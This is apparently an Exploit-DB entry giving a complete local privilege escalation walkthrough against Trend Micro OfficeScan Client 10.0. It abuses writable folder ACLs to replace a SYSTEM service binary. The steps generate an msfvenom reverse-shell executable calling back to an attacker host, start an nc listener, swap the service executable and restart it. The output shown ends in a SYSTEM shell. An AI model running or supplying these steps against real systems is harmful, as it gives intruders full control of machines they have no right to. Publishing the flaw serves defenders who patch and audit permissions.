Trend Micro OfficeScan Client 10.0 - ACL Service LPE

EDB-ID:

51453

CVE:

N/A


Author:

msd0pe

Type:

local


Platform:

Windows

Date:

2023-05-23


#  Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE 
#  Date: 2023/05/04                                                     
#  Exploit Author: msd0pe                                               
#  Vendor Homepage: https://www.trendmicro.com                          
#  My Github: https://github.com/msd0pe-1                                                                                             


Trend Micro OfficeScan Client:
Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access.

[1] Verify the folder rights:
    > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"

    C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
                                                         NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                                                         NT AUTHORITY\SYSTEM:(F)
                                                         NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                         BUILTIN\Administrators:(F)
                                                         BUILTIN\Administrators:(OI)(CI)(IO)(F)
                                                         BUILTIN\Users:(F)
                                                         BUILTIN\Users:(OI)(CI)(IO)(F)
                                                         CREATOR OWNER:(OI)(CI)(IO)(F)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)

[2] Get informations about the services:
    > sc qc tmlisten

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: tmlisten
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT Listener
            DEPENDENCIES       : Netman
                               : WinMgmt
            SERVICE_START_NAME : LocalSystem

OR

    > sc qc ntrtscan

    SERVICE_NAME: ntrtscan
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT RealTime Scan
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem

[3] Generate a reverse shell:
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe

    OR

    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe

[4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe

[5] Start listener
    > nc -lvp 4444

[6] Reboot the service/server
    > sc stop tmlisten
    > sc start tmlisten
    
    OR
    
    > sc stop ntrtscan
    > sc start ntrtscan

    OR

    > shutdown /r

[7] Enjoy !
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system